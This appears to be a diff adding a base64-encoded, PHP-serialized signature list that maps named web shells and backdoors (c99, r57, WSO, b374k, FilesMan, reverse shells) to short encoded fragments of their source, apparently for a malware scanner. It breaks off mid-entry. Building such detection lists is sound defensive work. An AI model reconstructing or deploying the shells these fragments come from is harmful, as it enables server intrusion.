+eUJ6ZEdSdmRYUWdhWE1nWVNCd2FYQmxJSFJvWVhRZ2RHaGxJR05vYVd4a0lIZCI7czoyMjoic2hl
+bGxhdGlsZGlbMV1bMF1bcGhwXSI7czo2NDoiM0p6Snl3Z01DazdEUXBBYzJWMFgzUnBiV1ZmYkds
+dGFYUW9NQ2s3RFFwQWMyVjBYMjFoWjJsalgzRjFiM1JsYyI7czoyMDoiMW43M2N0aW9uWzBdWzBd
+W3BocF0iO3M6NjQ6ImtZWFJoSjMwdURRb2pJRTkwYUdWeUlIWmhjbWxoWW14bGN5QmpZVzRnWW1V
+Z1lXTmpaWE56WldRZ2RYTnBibWMiO3M6MTk6ImNnaS1zaGVsbFswXVswXVtwbF0iO3M6NjQ6Inlh
+VzVuSUdSemRGQmhkR2dwSUhzS0NXSnZiMnhsWVc0Z1lsSmxkQ0E5SUhSeWRXVTdDZ2tLQ1hSeWVT
+QjdDZ2siO3M6MjM6ImpzcHdlYnNoZWxsWzBdWzBdW2phdmFdIjtzOjY0OiJCcFlqTldNR05JVmpC
+SmFVSXlXVmQ0TVZwVU1HbEtlbk5uV2xkT2IySjVRV3RpTTFZd1kwaFdNRTk1UW14Wk1tIjtzOjE1
+OiJjbWRbMzNdWzBdW3BocF0iO3M6NjQ6ImdQRDl3YUhBTkNpOHFJRTV2ZHlCM1pTQnRZV3RsSUdF
+Z2JHbHpkQ0J2WmlCMGFHVWdaR2x5WldOMGIzSnBaWE0iO3M6MjM6ImF5eWlsZGl6X3RpbVsxXVsw
+XVtwaHBdIjtzOjY0OiIwTjNaVzA0TDFRdlkzWm9ZMkV5WkVzelZrdEtMMlUzSzNrNFdHUjVPRWhs
+YVRVM1RVMDVXWEJWZHk5SWJ5OHphIjtzOjE1OiJjOTlbMThdWzBdW3BocF0iO3M6NjQ6IkdaMWJt
+TjBhVzl1WDJWNGFYTjBjeWduYjJOcFgyTnZibTVsWTNRbktTa2dEUW9nSUNBZ0lDQWdJQ1IwWlcx
+d1ciO3M6MjA6ImZpbGVzbWFuWzEzXVswXVtwaHBdIjtzOjY0OiJYM0psYzNSdmNtVW9JbTl3Wlc1
+ZlltRnpaV1JwY2lJcE93b2tiR2w2TUQxemFHVnNiRjlsZUdWaktDUmZVRTlUIjtzOjE4OiJsaXpv
+emltWzBdWzBdW3BocF0iO3M6NjQ6ImdiblZzYkRzS0pIVmtJRDBnZFhKc1pXNWpiMlJsS0NSa0tU
+c0tQejRLUEdoMGJXdytQR2hsWVdRK1BHMWxkR0UiO3M6MTQ6ImM5OVs2XVswXVtwaHBdIjtzOjY0
+OiJHVmphRzhnSWlSZlUwVlNWa1ZTVzFCSVVGOVRSVXhHWFNJZ095QS9QaUlnYldWMGFHOWtJRDBn
+SW5CdmMzUWlQIjtzOjIyOiJyZW1vdGVzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJWY01UWXlYSGcz
+TUZ4NE4yTmNNVFUxYzI1Y01UUXlYSGcyWmx4NE56UjhZMXg0TnpKY01UUXhYREUyTjJ4bGNuIjtz
+OjI2OiJzaGVsbF91cGxvYWRlclsxNl1bMF1bcGhwXSI7czo2NDoid00zcFhTMjVTWmtsaVJtaDBV
+RFZ4UlcxSE4xVnhXVXhRVkV4b1ZIUlVkMDl2YkhKTVUwSkRkM1F4ZGtOaFJrRiI7czoyMToibm9n
+cm9kcEJvdFsxXVsxXVtwaHBdIjtzOjY0OiJCcGMyRm9hMkZ1SUdSbGJtZGhiaUJ6Y0dGemFRMEtE
+UW92S2lvcUlFRmtiV2x1SUNvcUtpOE5DaVJoWkcxcGJpIjtzOjIxOiJnYXVsaXJjYm90WzBdWzJd
+W3BocF0iO3M6NjQ6IjJodklDSWdJRHgwWkNCdWIzZHlZWEFnWTI5c2MzQmhiajFjSWpaY0lpQnpk
+SGxzWlQxY0luQmhaR1JwYm1jdGIiO3M6MTU6ImVybmVbMF1bMF1bcGhwXSI7czo2NDoiTnBlbVU5
+TVRFd1Bqd3ZabTl5YlQ0OEwyTmxiblJsY2o0OFluSStDaUk3Q21sbUtFQWtYMUJQVTFSYkozTm9K
+MSI7czoxNDoiaW1nWzBdWzBdW3BocF0iO3M6NjQ6IngxYzJnb0tUc0tJQ0FnSUNBZ0lDQWdJQ0Fn
+SUNBZ0lDQWdJQ0FnSUNBZ2NtVjBkWEp1SUhKbGNHeGhZMlZPWlgiO3M6MTk6InB3bnNoZWxsWzBd
+WzBdW2pzcF0iO3M6NjQ6IlZ5ZG1WeVd6RmRMQ0FrYkdsdVpWc3dYU3dnSkhSdGNDa2dLU0I3RFEw
+S0NRa0pDUWtKQ1NSemRXTmpaWE56S3kiO3M6MTk6ImZpbGVzbWFuWzhdWzBdW3BocF0iO3M6NjQ6
+Im9KZlEwS2ZRMEtEUXAzYUdsc1pTZ2tiR1YyWld3dExTa2dZMmhrYVhJb0lpNHVJaWs3RFFvTkNp
+UmphQ0E5SUciO3M6MjY6Iml0c2VjdGVhbV9zaGVsbFsxXVswXVtwaHBdIjtzOjY0OiJJNU1EUmlP
+R05tWXpRNE5EZGpOVFZpTmlJN0lHbG1LR2x6YzJWMEtDUmZVa1ZSVlVWVFZGc25jSFZtWkcxeUox
+IjtzOjE1OiJjbWRbMjldWzBdW3BocF0iO3M6NjQ6IlZGVTFSYkoyTnRaQ2RkS1NsN0RRb2dJQ0Fn
+SUNBZ0lHVmphRzhnSWp4d2NtVStJanNOQ2lBZ0lDQWdJQ0FnSkciO3M6MTU6ImNtZFsyMF1bMF1b
+cGhwXSI7czo2NDoiVlFzSUNkVlZFWXRPQ2NwT3dvZ0lDQWdJQ0I5Q2dvZ0lDQWdJQ0IzYUdsc1pT
+QW9JV1psYjJZb0pHbHZXekpkSyI7czoyMDoiZGl2ZXNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6Ik1U
+QXdJaUIyWVd4MVpUMGlQRDhnWldOb2J5QWtZM1Z5WkdseU95QS9QaUkrUEM5MFpENEtJQ0FnSUNB
+Z1BIUmsiO3M6MjA6ImxhbWFzaGVsbFsxXVswXVtwaHBdIjtzOjY0OiJsSUcxbGRHaHZaRDF3YjNO
+MElHVnVZM1I1Y0dVOWJYVnNkR2x3WVhKMEwyWnZjbTB0WkdGMFlUNGdKRzV2ZDJGIjtzOjIwOiJw
+aHBzaGVsbFsyM11bMF1bcGhwXSI7czo2NDoiZ2RHVnliWE1nWVhKbElHNXZkQ0JoWTJObGNIUmhZ
+bXhsSUhSdklIbHZkU3dnZEdobGJnMEtMeThnWkc4Z2JtOSI7czoyNDoicmV2ZXJzZV9zaGVsbFsw
+XVswXVtwaHBdIjtzOjY0OiJpQmxibU52ZFc1MFpYSmxaQ0JoYmlCcGJuUmxjbTVoYkNCbGNuSnZj
+aUJ2Y2dwdGFYTmpiMjVtYVdkMWNtRjBhIjtzOjE5OiJtb2hhamVyMjJbMF1bMF1bcGxdIjtzOjY0
+OiJvU1dsR01VbElSV2xqVTBGcFNYbFphRWxwUVhOSmVWRm5aSGxGYUVwNVkybGthV05vU1ZORmFF
+bFRRWFJKZVRCIjtzOjIwOiJmaWxlc21hblsxOV1bMF1bcGhwXSI7czo2NDoibFJ6TllValJrYjNo
+bmVsSkpWMk5XVFc1amNVVjNURmMxZW5Wd09WZGpXV050ZW1WcVVEZFdObmRNYWxkM09XOCI7czox
+ODoid2Vicm9vdFswXVswXVtwaHBdIjtzOjY0OiJodklDUjBZV0pzWlY5MWNESTdDbVZqYUc4Z0pH
+WnZiblE3Q21WamFHOGdJanhpUGlJdWQzTW9NamNwTGlSc1lXIjtzOjE0OiJyNTdbMF1bMF1bcGhw
+XSI7czo2NDoiMHRMUzB0TFMwdExTMHRDZ29nSUVScGJTQnZVMk55YVhCMENpQWdSR2x0SUc5VFkz
+SnBjSFJPWlhRS0lDQkVhVyI7czoxNDoiY21kWzBdWzBdW2FzcF0iO3M6NjQ6ImxZVDRpT3cwS0pI
+Tm1iblE5SWp4bWIyNTBJR1poWTJVOWRHRm9iMjFoSUhOcGVtVTlNaUJqYjJ4dmNqMGpNREEiO3M6
+MTM6Im1tWzBdWzBdW3BocF0iO3M6NjQ6Ik5EVWs5TVRFSkJVaTFCVWxKUFZ5MURUMHhQVWpvZ0l6
+TTJNMlEwWlRzS1UwTlNUMHhNUWtGU0xWUlNRVU5MTFUiO3M6MTg6Im5zdHZpZXdbMl1bMF1bcGhw
+XSI7czo2NDoiVEl1Tmk0MExYQnNNaThuTEFvbkwzQm9jRTE1UVdSdGFXNHRNaTQyTGpRdGNHd3pM
+eWNzQ2ljdmNHaHdUWGxCWiI7czoyOToicGhwbXlhZG1pbl9leHBsb2l0WzBdWzBdW3BocF0iO3M6
+NjQ6Ik1sRm1ZbnBLVFhwM2FDdENTVXNLWWtGUFNUUmpTRzgyVjJNMFp5dFlUR2hGVDI5cGVHVjBl
+RGxFYmpOT2FtZFAiO3M6MTY6ImIzNzRrWzJdWzBdW3BocF0iO3M6NjQ6InBPT1ZKYU1FWTJiMjFW
+TkRZMFkwbFBNRUZqTVVkeVdVeGtlV2hNUkRkVVVITkVMM0IwVFN0NVlXMXNSRGw2ZEQiO3M6MjY6
+InNoZWxsX3VwbG9hZGVyWzEzXVswXVtwaHBdIjtzOjY0OiJlR3R5YjNKcElEMGdJbUU0WVRRM1l6
+QmhNVFkzTjJZd04yTmhaV1V3T0dGa1ptVmlOVGt6WldRd0lqc2dhV1lvIjtzOjE1OiJjbWRbMzVd
+WzBdW3BocF0iO3M6NjQ6InZZMnRsZENrN0RRcDlEUXB6Wlc1a2NtRjNLQ1JKVWtOZlkzVnlYM052
+WTJ0bGRDd2dJbEJTU1ZaTlUwY2dKSEIiO3M6MTk6ImVtcGl4Y3Jld1swXVswXVtwbF0iO3M6NjQ6
+Ind2ZEhJK0lqc05DZzBLY0hKcGJuUWdJangwY2o0OGRHUStQR0krUTJoaGJtZGxJR1JwY21WamRH
+OXllVG84TDIiO3M6MTY6IndvcnNlWzFdWzBdW3BocF0iO3M6NjQ6IlZWSkZKMTB1SWp3dlptOXVk
+RDQ4TDNSa1BpSTdDbkJ5YVc1MElDQWdJQ0k4TDNSeVBpSTdDbkJ5YVc1MElDQWciO3M6MTU6Indp
+bnhbMF1bMF1bcGhwXSI7czo2NDoiWlROWll6SmFXRGRzZFdOMk5sbEdlalpCWjBSbE5YRmFTR1V4
+TlN0bmRreHZVMDFtTkhsSFFteDJOSFpwTUhoViI7czoxNToid3NvWzExXVswXVtwaHBdIjtzOjY0
+OiJQWHQ5S1R0MllYSWdaejFqTG1JdVkyeHBZMnM3WjN4OEtHYzlZeTVpTG1Oc2FXTnJQWHQ5TEdN
+dWIyNWpiR2xqIjtzOjE3OiJiMzc0a1sxNF1bMF1bcGhwXSI7czo2NDoibHg0WmpWY2VHUTJYSGhq
+WTF4NE5tVmNlR0poWEhnd1pseDRNalJjZUdNMlhIZzVZMXg0TkdWY2VHTTBYSGhsTiI7czoxNToi
+Yzk5WzE1XVswXVtwaHBdIjtzOjY0OiJ5OHZPVlJaTkRBMVYyWnhUMjEyYWtrcllraHZZVzlSYzAx
+UmVGSXJkWFZpYmpkaWRTc3daaTh2TDNsSU5VSkJSIjtzOjE3OiJjb2RlcnpbMV1bMF1bcGhwXSI7
+czo2NDoiUmxJRDBnUUdsdWFWOW5aWFFvSjNOaFptVmZiVzlrWlNjcE93MEthV1lvSVNSellXWmxY
+MjF2WkdVcERRb2dJQyI7czoxNDoid3NvWzldWzBdW3BocF0iO3M6NjQ6IlBqeGhJR2h5WldZOUp5
+UlFTRkJmVTBWTVJqOWhZM1JwYjI0OWRYUnBiSE1tWTI5dGJXRnVaRDF6YUc5M1gzQnkiO3M6MTY6
+Im15c3FsWzNdWzBdW3BocF0iO3M6NjQ6IlNkdUp6NDhabTl1ZENCbVlXTmxQWFJoYUc5dFlTQnph
+WHBsUFMweVBqeGlQbTh0TFMxYklGTnVTWEJGY2w5VFEiO3M6MjI6InNuaXBlcnNoZWxsWzFdWzBd
+W3BocF0iO3M6NjQ6IkZsYlhFM1RuRjNPSE5ZUWxrd01sWTBkM1F3UnpscWRIZFhUSEpIZUVoaGJW
+Rm1URzA0UVhKU1pETm1MM3BtUXoiO3M6MjA6ImZpbGVzbWFuWzIyXVswXVtwaHBdIjtzOjY0OiJo
+Y25KaGVTazdDaUFnSUNBZ0lDQWdmUW9nSUNBZ0lDQWdJQ1JmVUU5VFZDQTlJSE4wY21sd2MyeGhj
+MmhsYzE5IjtzOjE0OiJ3c29bM11bMF1bcGhwXSI7czo2NDoidG1abWhWV21velNIaE1SVVJ0Y2pG
+SlowbG5jVlY1WTJoTFMzVTRjamsyYlVKRVNHdFFTRWcwYW5ZNGJTOUtVMCI7czoxNToid3NvWzEw
+XVswXVtwaHBdIjtzOjY0OiJmWW5WbVpsOXdjbVZ3WVhKbEtDazdJQTBLYVdZZ0tDRm1kVzVqZEds
+dmJsOWxlR2x6ZEhNb0ltTTVPVjl6WlhOIjtzOjE5OiJwaHBzaGVsbFs1XVswXVtwaHBdIjtzOjY0
+OiJZakkxTUVsSFRuWmlSemw1VUZOSmFrMUVRa2RTYWtGM1NXbzFNMlF6WTNWUldFcG9XV2t4UTJK
+SFJtcGhNbWhvIjtzOjI0OiJhcmFiX2JsYWNrX2hhdFsxXVswXVtwbF0iO3M6NjQ6ImdKR2x6YkdG
+emRDQTlJR0Z5Y21GNUtEQWdQVDRnVkZKVlJTazdDZ2xsWTJodktDSUpQSFJ5UGx4dUlpazdDZ2wi
+O3M6MTk6IndlYmFkbWluWzBdWzJdW3BocF0iO3M6NjQ6IjJGaWMyOXNkWFJsSnpzS1gzRXVjM1I1
+YkdVdWQybGtkR2dnUFNBbk1UWndlQ2M3Q2w5eFcxOXVYU2duWm5KaGIiO3M6MTY6InB6YWR2WzFd
+WzFdW3BocF0iO3M6NjQ6IlBEOXdhSEFLSkdWdWRISjVYMnhwYm1VOUlraEJRMHRsWkNCaWVTQkZi
+blJ5YVV0aElqc0tKR1p3SUQwZ1ptOXciO3M6MTg6ImVudHJpa2FbMF1bMF1bcGhwXSI7czo2NDoi
+bGVIUTFOQ2M5UGlmRGo4T3V3NmpEc2NPcUlNT3l3NlhEcXNPeHc3TERvQ0REb2lERHRNT2d3Nm5E
+cThPZ3c3VSI7czoxNDoicjU3WzNdWzBdW3BocF0iO3M6NjQ6Im5XVEpHZWxwVFFXbGpSMUp0U1dw
+dlowcEhUakJsV0VKc1VGTkthR05JUW5OaFYwNW9aRWRzZG1KcE9YZGFSMWwiO3M6MTk6ImI2NHNo
+ZWxsWzBdWzBdW3BocF0iO3M6NjQ6Ik9TVXc0VVUxeVdGVmpZMHBHWWt4NmJrSjBNME54WVdJNWRs
+RjRWMmhMVUdGMksyOWhNa0Z5VVdaM1NqWTRMMEoiO3M6MjA6InN0dW5zaGVsbFszXVswXVtwaHBd
+IjtzOjY0OiJtNWxZM1JDWVdOcklFSmhZMnRrYjI5eUlIWnpJREV1TUNCaWVTQk1iM0pFSUc5bUlF
+bFNRVTRnU0VGRFMwVlNVIjtzOjI1OiJiYWNrZG9vcmNvbm5lY3RbMF1bMF1bcGxdIjtzOjY0OiJp
+Ym05b2RYQWdMM1J0Y0M5dWMzUmZZbVFnSmlJcE93cDFibXhwYm1zb0lpOTBiWEF2Ym5OMFgyTmZZ
+bVF1WXlJIjtzOjE4OiJuc3R2aWV3WzFdWzBdW3BocF0iO3M6NjQ6ImxPdzBLRFFvZ0lDQjlEUW9O
+Q2cwS0RRcG1kVzVqZEdsdmJpQm5aWFJmY0dWeWJYTW9KR1p1S1EwS0RRcDdEUW8iO3M6MjA6Im4z
+ZmE1dDFjYVswXVswXVtwaHBdIjtzOjY0OiJXQ2N1SnpKT2RtSnVKeTRuVW14bFNGSW5MaWRtV1RO
+S2JGbFlVaWN1SjJ3bktTeGlZWE5sTmpSZlpHVmpiMlJsIjtzOjE3OiJpZnJhbWVbMF1bMF1bcGhw
+XSI7czo2NDoiTVR3bFFDQlFZV2RsSUV4aGJtZDFZV2RsUFNKS2MyTnlhWEIwSWlVK1BDVmxkbUZz
+S0ZKbGNYVmxjM1F1U1hSbCI7czoxNToiY21kWzM2XVswXVtwaHBdIjtzOjEzNToiYmI6SkY5YlhU
+MHJLeVJmWHpzZ0pGOWJYVDBrWDFzdExTUmZYMTFiSkY5ZlBqNGtYMTlkT3lSZld5UmZYMTB1UFNn
+b0pGOWZLeVJmWHlrcklDUmZXeVJmWHkwa1gxOWRLUzRvSkY5Zkt5UmZYeXNrWDE4cEt5UmZXeVJm
+WHkwa1gxOWRPdz09IjtzOjE1OiJjbWRbMjddWzBdW3BocF0iO3M6NjQ6ImRHWnZjbTBuWFNrcERR
+b2dJQ0FnZXcwS0lDQWdJQ0FrWmlBOUlDUmZSMFZVV3lkbWFXeGxKMTA3RFFvZ0lDQWciO3M6MTk6
+IjEyMDY2N2trWzBdWzBdW3BocF0iO3M6NjQ6Ik5MM2RCZFRKMWJsSmhlbEpxVlVseVlYTlFjMnBY
+VVdWNEswOUZjRXBEV25wVFJ6UmtRekZZU2paelMwTlVXa04iO3M6MjA6InN0dW5zaGVsbFs0XVsw
+XVtwaHBdIjtzOjY0OiJqNDhhVzV3ZFhRZ2JtRnRaVDBpWTIxa0lpQjBlWEJsUFNKMFpYaDBJaUJ6
+YVhwbFBTSXhNemdpSUhaaGJIVmxQIjtzOjE1OiJjbWRbMjhdWzBdW3BocF0iO3M6NjQ6IjhMM1Jo
+WW14bFBpSTdDZ29nSkhCbGNtUnBjaUE5SUVCd1pYSnRhWE56YVc5dWN5aG1hV3hsY0dWeWJYTW9K
+SFIiO3M6MTY6InhpbmZvWzBdWzBdW3BocF0iO3M6NjQ6Ik5mWVhKeUlEMGdKRzV2ZEd4eklEMGdi
+blZzYkRzS0pIVmtJRDBnZFhKc1pXNWpiMlJsS0NSa0tUc0tQejQ4YUgiO3M6MTU6ImM5OVsxMV1b
+MF1bcGhwXSI7czo2NDoiclFtcEhUVmsyTjFCQ1RYSjFkemhqTlhSbFRqSTFka1JGVjI0NWJrbGph
+amx6UW05cGJXTjJaVVZ1U0dFNFFXVSI7czoyMDoicGhwc2hlbGxbMjFdWzBdW3BocF0iO3M6NjQ6
+ImlBZ0lDQWdJR0p5WldGck93MEtJQ0FnZlEwS0RRb2dJQ0F2THlCWFlXbDBJSFZ1ZEdsc0lHRWdZ
+Mjl0YldGdVoiO3M6MjI6InNoZWxsYXRpbGRpWzBdWzBdW3BocF0iO3M6NjQ6IlIwYVVvMk1Ia3pN
+WEJCVDNCRVJubEtaVWRvYjA1VWJYQk9jVGhDVjNNd2VXRjZPRWx6VEd4Q2JVMW1RazlsZDIiO3M6
+MTk6ImZpbGVzbWFuWzRdWzBdW3BocF0iO3M6NjI6IklDaHVjM1FwSUhkb2FXTm9JR3g1Ym5nTkNr
+bHpJR3hwYm10eklHbHVjM1JoYkd4bFpEOGdLRzV6ZENrZ2QyIjtzOjE4OiJuc3R2aWV3WzNdWzBd
+W3BocF0iO3M6NjQ6ImJXRnBiQ2h6S1NFaUtUc05DZzBLZlEwS1pXTm9ieUFpVTNWalkyVnpjMlox
+Ykd4NUlITmxiblFnYldGcGJDaHoiO3M6MjM6ImJsb29kM3Jwcml2OFswXVswXVtwaHBdIjtzOjY0
+OiJaVDBpZEdWNGRDSWdibUZ0WlQwaWJuSmxibUZ0WlNJK0RRbzhhVzV3ZFhRZ2RIbHdaVDBpYzNW
+aWJXbDBJaUIyIjtzOjIyOiJzdGFrZXJzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJnUFNBaVpuVnVZ
+M1JwYjI1eklpa2dld29nSUNBZ0lDQWdJQ0FnSUNCcFppQW9KSE4wWVhSbFBUMHhLU0I3Q2lBIjtz
+OjE2OiJteXNxbFs1XVswXVtwaHBdIjtzOjY0OiJBOUlDSmtaWFpwYkhwVGFHVnNiQ0k3RFFva2My
+aGxiR3hmWm1GclpWOXVZVzFsSUQwZ0lsTmxjblpsY2lCTWIyIjtzOjIyOiJkZXZpbHpzaGVsbFsx
+XVswXVtwaHBdIjtzOjY0OiJ5WWpNVFl3TlRzbUl6RTJNRGc3SmlNeE5qQXlPeVlqTVRVNU16czhM
+Mlp2Ym5RK1BDOXpjR0Z1UGp4bWIyNTBJIjtzOjE0OiJjOTlbN11bMF1bcGhwXSI7czo2NDoiaGJX
+VXBPdzBLZlEwS1pXeHpaV2xtS0NSZlVFOVRWRnNuZEhsd1pTZGRQVDAzS1EwS2V3MEtaV05vYnlC
+aGJHbCI7czoyMDoicm9vdHNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6IlJ6aE9lR3N3YjFCa1IxbEdZ
+Mk5CV0VWVFRUUnRhMWRLVERNMUwyWnFVVFEwVERoelZUUkZNMm94VDFacGJGQm4iO3M6MTQ6ImM5
+OVszXVswXVtwaHBdIjtzOjY0OiJITW9KSFkyTm1JeE9EZzJOaXdnTkRBNU5pa3BJSHNnSkhZNFpE
+YzNOMll6T0NBdVBTQWtkak0wTVdKbE9UZGtPIjtzOjE1OiJzcGFtWzFdWzBdW3BocF0iO3M6NjQ6
+IklHUmxiR1YwWlNCMGFHVWdaM3BwY0NCbWFXeGxJR0ZzYzI4dUlFa2djbVZqYjIxdFpXNWtJR3hs
+WVhacGJtY2ciO3M6MTc6ImJhY2t1cFsxXVsyXVtwaHBdIjtzOjY0OiJwWmlocGMzTmxkQ2drWTIx
+a1d6RmRLU0FtSmlBa1kyMWtXekZkSUQwOUlqQXdNU0lwRFFvZ0lDQWdJQ0FnZXcwIjtzOjE1OiJw
+Ym90WzBdWzBdW3BocF0iO3M6NjQ6ImJreHVNMUZpVkZKamIwaFVhR3REUWxKVVNYcG5VazFaUVVa
+U2JWbHZOWEJJY1VGSGFucFdjV2hEWTNGblIzQmoiO3M6MTk6IndlYnNoZWxsWzBdWzBdW3BocF0i
+O3M6NjQ6ImlJaTRrY0hka0xpSmNJaUF2UGdvSkNUd3ZabTl5YlQ0S0NRazhMMlJwZGo0aU93b0pD
+U1J6WDNKbGMzVnNkQ0EiO3M6MTY6ImIzNzRrWzhdWzBdW3BocF0iO3M6NjQ6IjFaMlVETTNURVZC
+VkdGdlVYQkVVRzAwVDFOellucFRlVTEwWWk5MmVqQkpOVzltUkdwMU56WTBiMG95TlZSaVciO3M6
+MTQ6ImM5OVswXVswXVtwaHBdIjtzOjY0OiJJQ0FnSkhCeVkzTWdQU0JoY25KaGVTZ3BPdzBLSUNB
+Z0lDQWdkVzV6WlhRb0pITjBZV05yV3pCZEtUc05DaUFnIjtzOjIyOiJGYVRhTGlzVGlDelsxXVsw
+XVtwaHBdIjtzOjY0OiJ4dmNqMGlVbVZrSWo0Z0NpQWdJQ0FnSUNBZ0lDQThkR1Y0ZEdGeVpXRWdi
+bUZ0WlQwaVpIVjZaVzU0SWlBS0lDIjtzOjE5OiJrbGFzdmF5dlswXVswXVthc3BdIjtzOjY0OiJT
+V1ZIWkVSRFpXUkxWa3BmVGtGUE5ua3FkSGxuY2tocWNDcE1ORXBhT1hwQmVrNXpaa2xYVEUxQ05G
+cEhNblJ5IjtzOjE1OiJ3c29bMTRdWzBdW3BocF0iO3M6NjQ6ImlBa2NHOXlkR0VzSUZCeWIzUnZJ
+RDArSUNkMFkzQW5MQ0JVYVcxbGIzVjBJRDArSURRcE93b2dJQ0FnSUNBZ0kiO3M6MTg6InNoZWxs
+Ym90WzFdWzBdW3BsXSI7czo2NDoiVEF3SlNJZ2FXUTlJa0YxZEc5T2RXMWlaWEkwSWlCb1pXbG5h
+SFE5SWpFNUlqNEtJQ0FnSUNBZ0lDQWdJRHgwYyI7czoxNzoicGh2YXl2WzBdWzBdW3BocF0iO3M6
+NjQ6ImxsYm5SbExUNXlaVzF2ZG1Vb0pHWm9LVHNLSUNBZ0lDQWdKR1pvTFQ1amJHOXpaVHNLSUNB
+Z0lDQWdaR1ZzWlgiO3M6MTU6InpvcnJvWzFdWzBdW3BsXSI7czo2NDoic2JtdGhTSE41VlRZNFNI
+cHhTa3R5Tmk5bU4zbFpUVmh5WVdOV1luZG1UMVpxVEhobVRtTTNkVmgwSzNaMGNEbCI7czoxNDoi
+aTQ3WzBdWzBdW3BocF0iO3M6NjQ6Ino1Y2JpSTdDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0Fn
+Y0hKcGJuUWdJbE5qY21sd2REb2dQR0p5SUM4K1AiO3M6MTc6Imxvc3RkY1swXVswXVtwaHBdIjtz
+OjY0OiJDOHZaUzVuSUNKak9pSXNJQ0l2SWl3aUwyaHZiV1VpQ2lSMGFXMWxiR2x0YVhRZ1BTQTJN
+RHNnTHk5c2FXMXBkIjtzOjE1OiJjOTlbMTJdWzBdW3BocF0iO3M6NjQ6IjNWc2RBb2diSFpCZEhS
+eWFXSjFkR1Z6SUQwZ1UzQnNhWFFvUTI5dWRtVnlkRUpwYm1GeWVTaEJkSFJ5YVdKMWQiO3M6MjM6
+InJlbW92ZXhwbG9yZXJbMF1bMF1bdmJdIjtzOjY0OiJvSVdaMWJtTjBhVzl1WDJWNGFYTjBjeWh6
+YUdWc2JGOWxlR1ZqS1NsN0pHOXdiM0E5Y0c5d1pXNG9KRzlqYldRIjtzOjE3OiJla2luMHhbMF1b
+MF1bcGhwXSI7czo2NDoiQ0FnSUNBZ2NISnBiblJNYjJkcGJpZ3BPdzBLQ1VCcGJtbGZjMlYwS0Nk
+dmRYUndkWFJmWW5WbVptVnlhVzVuSiI7czoyMDoiMW43M2N0aW9uWzFdWzBdW3BocF0iO3M6NjQ6
+IklEd3ZkR1ErUEhSa1BqeG1iMjUwSUdOdmJHOXlQWGxsYkd4dmR6NTVZWHB0WVNCNVpYUnJhWE5w
+SUhaaGNpRTgiO3M6MTc6InplaGlyNFswXVswXVthc3BdIjtzOjY0OiIyWVhJZ2N5eGhMR2tzYWl4
+eUxHTXNiQ3hpUFdSdlkzVnRaVzUwTG1kbGRFVnNaVzFsYm5SelFubFVZV2RPWVcxIjtzOjE1OiJ3
+c29bMjBdWzBdW3BocF0iO3M6NjQ6Ims3RFFvZ0lDQjlEUW9nSUNCcFppQW9YQ1JqWVhObElEMStJ
+QzllYlhOblhITXJLRnhUS3lrZ0tDNHFLUzhwSUgiO3M6MjA6ImVneXNwaWRlclsxXVswXVtwaHBd
+IjtzOjY0OiJUZHlJN0RRb2tjRzl5ZEZzeU1UQTJYU0E5SUNKTldrRlFJanNOQ2lSd2IzSjBXekl4
+TkRCZElEMGdJa1JsWlhCIjtzOjE0OiJnZnNbMl1bMF1bcGhwXSI7czo2NDoiMldsVXphMmhFVEV0
+RGJHeHliMnMwUjA1WFNGZG5jMU5VZVZocE0xZHZkVmxMV0RWbVUweHlXR3h5U0ZsV1NrZCI7czoy
+NToic2hlbGxfdXBsb2FkZXJbOV1bMF1bcGhwXSI7czo2NDoiRGV5UmtZMk56YjJOcmZYdGpkWEpp
+ZVhSbGZTQTlJREE3RFFvZ0lDUkVRME43SkdSalkzTnZZMnQ5ZTJGeWNYViI7czoxODoic2hlbGxi
+b3RbMF1bMF1bcGxdIjtzOjY0OiIzZ3NKR1YwTENSbWIyOTBaWElzSkdoamQyUTdEUXBsWTJodklD
+YzhhVzFuSUhOeVl6MGlhSFIwY0RvdkwzY3diIjtzOjE1OiJvYmV0WzBdWzBdW3BocF0iO3M6NjQ6
+IjI5eVlYUnBiMjQ2Ym05dVpRcDlDaTh2TFMwK0Nqd3ZjM1I1YkdVK0Nqd3ZhR1ZoWkQ0S1BHSnZa
+SGsrQ2p3L0MiO3M6MTY6Im15c3FsWzFdWzBdW3BocF0iO3M6NjQ6ImtwS1NsN0RRcGxZMmh2S0NK
+VFlXWmxJRTF2WkdVZ2IyWWdkR2hwY3lCVFpYSjJaWElnYVhNZ09pQWlLVHNOQ20iO3M6MTU6ImNt
+ZFsyMl1bMF1bcGhwXSI7czo2NDoiRkkrQ2p3L2NHaHdDaUFnZlFvL1Bnb2dJRHhVVWo0S0NpQWdQ
+RlJFUGp4RVNWWWdVMVJaVEVVOUltWnZiblF0WiI7czoxNjoiaDRudHVbMF1bMF1bcGhwXSI7czo2
+NDoiZGZZbXhoYm1zbklHaHlaV1k5SnlSamIyNW1hV2NuUG1OdmJtWnBaend2WVQ0OEwzUmtQangw
+WkQ0aUxpUnlMaSI7czoxODoic3ltbGlua1sxXVswXVtwaHBdIjtzOjY0OiJOUU0yTnBORTFUY21s
+WGRrVlROVEZWYjJORlRFVXZVSGxaYUdOWmFrZHJialpSYldJelIwdzBPRkF3V0Zwa2JrIjtzOjE0
+OiJyNTdbNF1bMF1bcGhwXSI7czo2NDoiWW1zd2RrNVhOSFpSVlhCMVREQXdNV0pwT1dGalJ6UjJZ
+bFp3ZFV3emNFdGlhVGgyVDBoa1FsRlZNVE5SVTBsMSI7czoyMToibG9jdXNzaGVsbFswXVswXVtw
+aHBdIjtzOjY0OiJNeldqWmtiMEZhZVdkc2JXRkZaRmxtZGk5SmJtMXVhVlZJZEdWbVJFRkphWE5z
+UW1kQ1QyRTJha0phS3pCYWVVIjtzOjE5OiJmaWxlc21hblszXVswXVtwaHBdIjtzOjY0OiIwUWxS
+bWVVUm1abmRCUkRRMmNVRkJRVUZwTXpNNGFUQXdUWGRtT0VWVU5ERk5UV1o1UkM5Nk9USkJNbTh2
+V0RSIjtzOjE4OiJ3YWNraW5nWzBdWzBdW3BocF0iO3M6NjQ6IlJjZURZNWIyNWhiR3g1TENCY2VE
+WXhJRng0TXpRd05DQk9YSGcyWm5SY2VESXdYSGcwTmx4NE5tWmNlRGMxYm0iO3M6MTU6Indzb1sx
